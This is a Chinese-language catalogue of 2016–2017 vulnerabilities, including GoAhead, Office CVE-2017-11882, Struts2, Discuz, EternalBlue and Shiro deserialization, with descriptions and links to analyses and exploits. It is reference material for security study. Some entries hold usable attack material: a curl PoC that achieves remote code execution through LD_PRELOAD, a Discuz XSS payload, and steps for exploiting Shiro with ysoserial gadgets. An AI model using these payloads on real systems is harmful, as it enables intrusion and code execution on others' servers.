    • 漏洞描述:在初始化CGI脚本环境时,未限制用户参数中的环境变量名。该漏洞将影响所有开启了CGI脚本支持(动态链接可执行脚本文件)的GoAhead服务。通过传入恶意的LD_PRELOAD变量可以Hook服务器端的共享函数库,执行恶意动态链接对象。而且launchCgi方法会使用dup2()来处理stdin文件描述符,而它指向的是一个包含了POST请求body内容的临时文件。而Linux procfs文件系统的符号链接可以帮助我们直接引用stdin描述符,而它指向的就是我们所要找的临时文件。这样我们可以在Post Body中传入恶意Payload和相关构造器,来远程利用这个漏洞。
    • PoC:curl -X POST –data-binary @payload.so http://makemyday/cgi-bin/cgitest?LD_PRELOAD=/proc/self/fd/0 -i
    • 漏洞分析:http://mp.weixin.qq.com/s/fDR1tVvMJwXTeOWphUQl1Q
    • 漏洞分析:http://www.52bug.cn/%E9%BB%91%E5%AE%A2%E6%8A%80%E6%9C%AF/4282.html
  3. 【20171211】 Apache Synapse反序列化命令执行漏洞
  4. 【20171130】大脏牛漏洞 - Linux提权
  5. 【20171127】Office Word命令执行漏洞 CVE-2017-11882
    • 2017年11月14日,微软发布了11月的安全补丁更新,其中CVE-2017-11882是一个远程执行漏洞,通杀目前市面上的所有office版本及Windows操作系统(包括刚刚停止支持的Office 2007)。该漏洞的成因是EQNEDT32.EXE进程在读入包含MathType的ole数据时,在拷贝公式字体名称时没有对名称长度进行校验,从而造成栈缓冲区溢出,是一个非常经典的栈溢出漏洞。
    • 漏洞分析:http://bobao.360.cn/learning/detail/4753.html
    • 利用程序:https://github.com/embedi/CVE-2017-11882
  6. 【20171116】CouchDB远程代码执行漏洞 - 参数污染加管理员
  7. 【20171020】Discuz竞价排行XSS漏洞

    • /misc.php?mod=ranklist&type=member 添加上榜宣言 <img src=1 onerror=alert(1)>
    • /misc.php?mod=ranklist&type=index 鼠标移动到当前用户头像处,触发XSS漏洞
    • 补丁:https://gitee.com/ComsenzDiscuz/DiscuzX/
  8. 【20171019】Apache Solr 7.0.1 - XML External Entity Expansion / Remote Code Execution

  9. 【20170929】Discuz!X任意文件删除漏洞

  10. 【20170928】Spring Data Rest远程代码执行漏洞

  11. 【20170920】Tomcat绕过安全限制PUT上传JSP文件,导致远程代码执行

  12. 【20170920】Wordpress SQLi、XSS等高危漏洞修复

  13. 【20170919】Apache Optionsbleed漏洞

  14. 【20170908】 S2-053 Struts2 Freemarker标签远程代码执行

    • https://cwiki.apache.org/confluence/display/WW/S2-053
  15. 【20170907】S2-052 Struts2 Rest插件反序列化命令执行漏洞

    • https://cwiki.apache.org/confluence/display/WW/S2-052
    • 分析:提交XML格式的恶意请求进行利用。
    • 安全版本:2.3.34、2.5.13
  16. 【20170809】Office任意代码执行 CVE-2017-0199
  17. 【20170613】CVE-2017-8464 Windows快捷方式任意代码执行漏洞
    • 描述:本地用户或远程攻击者可以利用该漏洞生成特制的快捷方式,并通过可移动设备或者远程共享的方式导致远程代码执行。
    • 利用条件:需要U盘自动播放才能发挥效果
    • 影响范围: Windows 7 Windows 8.1 Windows RT 8.1 Windows 10 Windows Server 2008 Windows Server 2008 R2 Windows Server 2012 Windows Server 2012 R2 Windows Server 2016
    • 漏洞文章: http://www.freebuf.com/news/143356.html
  18. 【20170512】永恒之蓝漏洞 MS17-010 CVE-2017-0144
  19. 【20170418】Fastjson反序列化漏洞
  20. 【20170401】Supervisord RPC服务端RCE漏洞(需认证)

2016

  1. 【201610】DirtyCow脏牛提权漏洞CVE-2016-5195
  2. 【20160718】Shiro 1.2.4反序列化命令执行漏洞
    • 描述:Cookie中rememberMe字段使用硬编码的AES加密,并且会被反序列化。所以可以被篡改为反序列化Gadget进行命令执行。
    • 漏洞利用:需要根据目标的环境选择相应的Gadget,目标环境如有"commons-collections4:4.0"的漏洞类库,则可以用ysoserial的CommonsCollections2 payload直接打。但是如果目标环境是"commons-collections:3.1、3.2.1"类库的话,必须用JRMPClient中转一下,攻击者服务器监听JRMPListener再用CommonsCollection6等payload打。
    • 利用分析:对于commons-collections3.2.1环境,如果直接打commonscollection的payload,会报错: java.lang.ClassNotFoundException: Unable to load ObjectStreamClass [[Lorg.apache.commons.collections.Transformer;: static final long serialVersionUID = -4803604734341277543L;]: 报错的原因是因为:Shiro resovleClass使用的是ClassLoader.loadClass()而非Class.forName(),而ClassLoader.loadClass不支持装载数组类型的class。
    • 漏洞分析:直接利用CommonsCollection执行 https://paper.seebug.org/shiro-rememberme-1-2-4/
    • 漏洞分析:利用JRMPListener执行 http://www.yilan.io/article/5b4dce6512d8c64b05ffd540
    • 官方issue:https://issues.apache.org/jira/browse/SHIRO-550
    • 漏洞延伸:https://mp.weixin.qq.com/s/NRx-rDBEFEbZYrfnRw2iDw